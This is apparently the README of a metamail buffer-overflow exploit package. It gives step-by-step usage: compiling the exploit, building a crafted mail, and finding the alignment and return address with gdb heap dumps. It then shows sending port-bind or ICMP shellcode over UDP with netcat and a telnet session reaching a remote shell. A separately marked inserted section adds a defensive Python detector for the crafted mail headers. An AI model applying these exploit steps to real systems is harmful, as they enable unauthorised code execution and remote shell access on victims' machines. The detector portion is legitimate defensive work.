//////////////////// priestmasters metamail <= 2.7 exploit /////////////////////
/////////////////////// <priest@priestmaster.org> /////////////////////////////
///////////////////// http://www.priestmaster.org /////////////////////////////

* How to use this exploit?

This exploit targets the metamail buffer overflow vulnerability. Thanks to
Ulf (metaur) for the proof-of-concept exploit. Compile it with

- gcc metaexpl.c -o metaexpl

and launch it with

- ./metaexpl align retaddr

The output is a specially crafted mail. Pipe it to a file and launch metamail.
Example:

- ./metaexpl 0 0x8054050 > mail
- metamail mail

If you have the correct align and retaddr, you should see an open UDP port
at 13330. Search for it with:

- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address           Foreign Address         State
- udp        0      0 *:13330                 *:*

Now you can send your shellcode to port 13330.
I added two shellcodes to this exploit. One is a portbind TCP port 65535 code and
the other uses ICMP and the ping utility to launch code. You can send it
with:

- cat bindsockshc | netcat -u yourip 13330

or 

- cat icmpshc | netcat -u yourip 13330

If you used the bind shellcode, now telnet to ipaddr on port 65535:

- telnet ipaddr 65535
- Trying ::1...
- telnet: connect to address ::1: Connection refused
- Trying 127.0.0.1...
- Connected to localhost.
- Escape character is '^]'.
- id;
- uid=100(hack) gid=100(users) groups=100(users)
- : command not found

For the ICMP shellcode, look at the icmp.c file in this package.

----------------------

* How can I find the correct offset for other Linux distributions?

Align 0 and return address 0x8054050 works for German SuSE Linux 7.0. The
target is in the file "targets" in this package. Please send me the targets of
your Linux distributions. If you want to exploit another distribution, you need
another align and return address. Launch the exploit with align 0 and any
return address.

- ./metaexpl 1 0x41424344 > /tmp/mail

Now open gdb with the metamail executable and run it with the mail as argument:

- gdb metamail
- (gdb)
- (gdb) r mail
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x68726979 in ?? ()

You have the wrong offset. Switch to another terminal and create a new mail
with another offset. Positive and negative values are allowed.

- ./metaexpl 2 0x41424344 > /tmp/mail

Now in gdb:

- (gdb) r mail
- The program being debugged has been started already.
- Start it from the beginning? (y or n) y
- Starting program: /usr/bin/metamail mail

- Program received signal SIGSEGV, Segmentation fault.
- 0x61626364 in ?? ()
- (gdb)

Yeah !!! Now we have the correct offset (ABCD is normally \x41\x42\x43\x44 in
hex, but metamail adds 0x20 to it). Let's search for the return address
(the return address is located on the heap):

- maintenance info sections
- ...
- 0x08053080->0x08053450 at 0x0000a080: .data ALLOC LOAD DATA HAS_CONTENTS
- 0x08053450->0x08053454 at 0x0000a450: .eh_frame ALLOC LOAD DATA HAS_CONTENTS
- 0x08053454->0x0805345c at 0x0000a454: .ctors ALLOC LOAD DATA HAS_CONTENTS
- 0x0805345c->0x08053464 at 0x0000a45c: .dtors ALLOC LOAD DATA HAS_CONTENTS
- 0x08053464->0x08053558 at 0x0000a464: .got ALLOC LOAD DATA HAS_CONTENTS
- 0x08053558->0x080535f8 at 0x0000a558: .dynamic ALLOC LOAD DATA HAS_CONTENTS
- 0x08053600->0x08053e50 at 0x0000a600: .bss ALLOC
- 0x00000000->0x0000017c at 0x0000a600: .comment READONLY HAS_CONTENTS
- 0x08053e50->0x08053f18 at 0x0000a77c: .note READONLY HAS_CONTENTS
-             ^^^^^^^^^^

Now search for the nops (the heap starts after 0x08053f18):

- (gdb) x/1000x 0x08053f18
- 0x8053f18:      0x08053f68      0xffffffff      0xffffffff      0x00000000
- 0x8053f28:      0x00000000      0x00000000      0x00000000      0x00000000
- 0x8053f38:      0x00000000      0x00000000      0x00000000      0x00000000
- 0x8053f48:      0x00000000      0x00000000      0x00000000      0x00000000
- 0x8053f58:      0x00000000      0x00000000      0x00000000      0x400f5d80
- 0x8053f68:      0x00000000      0x00000000      0x00000000      0x00000000
- 0x8053f78:      0x00000000      0x00000000      0x00000000      0x000003f1
- 0x8053f88:      0x485f4d4d      0x45444145      0x0a3d5352      0x6d6f7246
- 0x8053f98:      0x3f3d203a      0x47474747      0x47474747      0x47474747
- 0x8053fa8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053fb8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053fc8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053fd8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053fe8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8053ff8:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8054008:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8054018:      0x47474747      0x47474747      0x47474747      0x47474747
- 0x8054028:      0x47474747      0x47474747      0x47474747      0x47474747
- ...

0x47474747 are the nops. All addresses inside the 0x47474747 region are valid return
addresses. Take an address in the middle of the nop buffer; 0x8053fc8
is a good one, for example. Ok, we have our values. We can exploit it:

- metaexpl 2 0x8053fc8 > /tmp/mail
- metamail /tmp/mail
- netstat --udp -a
- Active Internet connections (servers and established)
- Proto Recv-Q Send-Q Local Address           Foreign Address         State
- udp        0      0 *:13330                 *:*
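A defensive counterpart, added here and not part of this package: a small Python check that flags mail whose headers are shaped like the crafted message visible in the heap dump above, a `From: =?` encoded-word opener followed by hundreds of 0x47 ('G') filler bytes. The thresholds and both sample messages are constructed for the example.

```python
import re

# Thresholds are assumptions for this example: a normal header value stays
# well below 256 bytes, and no legitimate header holds 64+ identical bytes.
MAX_HEADER_VALUE = 256
MIN_FILL_RUN = 64
# A well-formed RFC 2047 encoded-word: =?charset?Q-or-B?text?=
ENCODED_WORD = re.compile(r"=\?[^?]*\?[bBqQ]\?[^?]*\?=")
# A run of one repeated byte, the shape of the 0x47 ('G') filler in the dump.
SAME_BYTE_RUN = re.compile(r"(.)\1{%d,}" % (MIN_FILL_RUN - 1))


def parse_headers(raw: str) -> list:
    """Split the header block into (name, value) pairs, unfolding continuation
    lines so a long value cannot hide by being folded across several lines."""
    headers = []
    for line in raw.split("\n"):
        if line.strip() == "":
            break                                   # end of header block
        if line[0] in " \t" and headers:            # folded continuation
            name, value = headers[-1]
            headers[-1] = (name, value + " " + line.strip())
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return headers


def suspicious_headers(raw: str) -> dict:
    """Map each header name to the reasons it looks like the overflow payload."""
    findings = {}
    for name, value in parse_headers(raw):
        reasons = []
        if len(value) > MAX_HEADER_VALUE:
            reasons.append("value length %d exceeds %d" % (len(value), MAX_HEADER_VALUE))
        if "=?" in value and not ENCODED_WORD.search(value):
            reasons.append("unterminated RFC 2047 encoded-word")
        run = SAME_BYTE_RUN.search(value)
        if run:
            reasons.append("%d-byte run of %r" % (len(run.group(0)), run.group(1)))
        if reasons:
            findings.setdefault(name, []).extend(reasons)
    return findings


# Constructed samples (not real mail): a benign encoded From header, and a message
# shaped like the crafted one in the dump: "From: =?" then 'G' filler, folded.
BENIGN_MAIL = ("From: =?ISO-8859-1?Q?J=F6rg_Beispiel?= <joerg@example.org>\n"
               "Subject: monthly report\n\nbody\n")
CRAFTED_MAIL = ("Subject: test\nFrom: =?" + "G" * 200 + "\n " + "G" * 200
                + "\n\nbody\n")
```

Running `suspicious_headers` over a mail spool before it reaches metamail, or as a mail-filter rule, catches this payload shape whatever offset or return address the attacker picked.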

If you have questions, targets or anything else, mail me at

<priest@priestmaster.org>.

Happy hacking

priestmaster
